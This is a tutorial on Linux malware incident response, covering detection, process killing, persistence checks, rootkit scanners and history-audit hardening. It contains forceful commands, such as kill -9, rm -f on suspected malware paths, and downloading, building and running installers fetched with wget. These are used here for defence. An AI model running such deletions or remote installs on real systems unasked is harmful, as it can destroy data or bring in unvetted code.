Master Linux Incident Response: Step‑by‑Step Virus Detection and Removal

Overview

Handling emergency response incidents on Linux can be challenging because Linux lacks dedicated tools like Autorun or Process Explorer and does not have a unified response workflow. This article explains a Linux incident response process and provides the shell commands used at each stage to help you quickly and systematically handle Linux malware.

The response is divided into four stages: identify symptoms → remove the virus → close the loop → system hardening.

Identify Symptoms

First, detect abnormal host behavior through system status and security alerts to confirm suspicious activity.

Check CPU usage; high CPU (>70%) with a suspicious process name often indicates a mining virus.

List processes sorted by CPU: top Inspect process command lines: ps -aux Look for unusual command‑line strings (e.g., URLs) that may indicate a downloader.

Security Gateway Alerts

Use gateway alerts to spot threats, then identify which process is communicating with C&C servers. while true; do netstat -antp | grep [ip]; done If the malicious entity is a domain with changing IPs, add a rule to /etc/hosts to redirect the domain to a random IP and monitor the associated process.

Suspicious History Commands

Search the host’s command history for malicious commands:

history

Remove Virus

Use the information gathered in the first stage to locate and terminate virus processes and delete infected files.

Terminate Virus Process

ps -elf | grep [pid]
kill -9 [pid]

Delete Virus Files

ls -al /proc/[pid]/exe
rm -f [exe_path]

Close Loop (Persistence Removal)

Linux malware persistence methods are fewer than Windows but include scheduled tasks, malicious services, hijacked system files, and daemon processes.

Check Suspicious Cron Jobs

crontab -l

View anacron tasks:

cat /etc/anacrontab

Check Suspicious Services

service --status-all

Search for modified system binaries in the last 7 days:

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 | xargs ls -la

Inspect potential daemon processes:

lsof -p [pid]

Scan for Malicious Drivers

lsmod

Use chkrootkit and rkhunter for rootkit detection:

wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
 tar zxvf chkrootkit.tar.gz
 cd chkrootkit-0.52
 make sense
 ./chkrootkit

wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
 tar zxvf rkhunter-1.4.4.tar.gz
 cd rkhunter-1.4.4
 ./installer.sh --install
 rkhunter -c

Command Auditing

Enhance history logging with IP address, timestamp, and user information.

sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile

USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`
if [ "$USER_IP" = "" ]; then
  USER_IP=`hostname`
fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"

source /etc/profile

Patch Common Web Vulnerabilities

Apply patches for known RCE vulnerabilities such as structs2, ThinkPHP5, Redis unauthorized access, Confluence (CVE‑2019‑3396), Drupal (CVE‑2018‑7600), ThinkPHP (CVE‑2019‑9082).

Conclusion

Linux malware mainly consists of botnet worms and mining viruses. Because Linux servers are often exposed to the Internet and web applications have frequent vulnerabilities, large‑scale infections are common (e.g., DDG, systemdMiner, BillGates, watchdogs, XorDDos). Adopt strong passwords, regularly patch systems, and follow the steps above to detect, eradicate, and prevent future infections.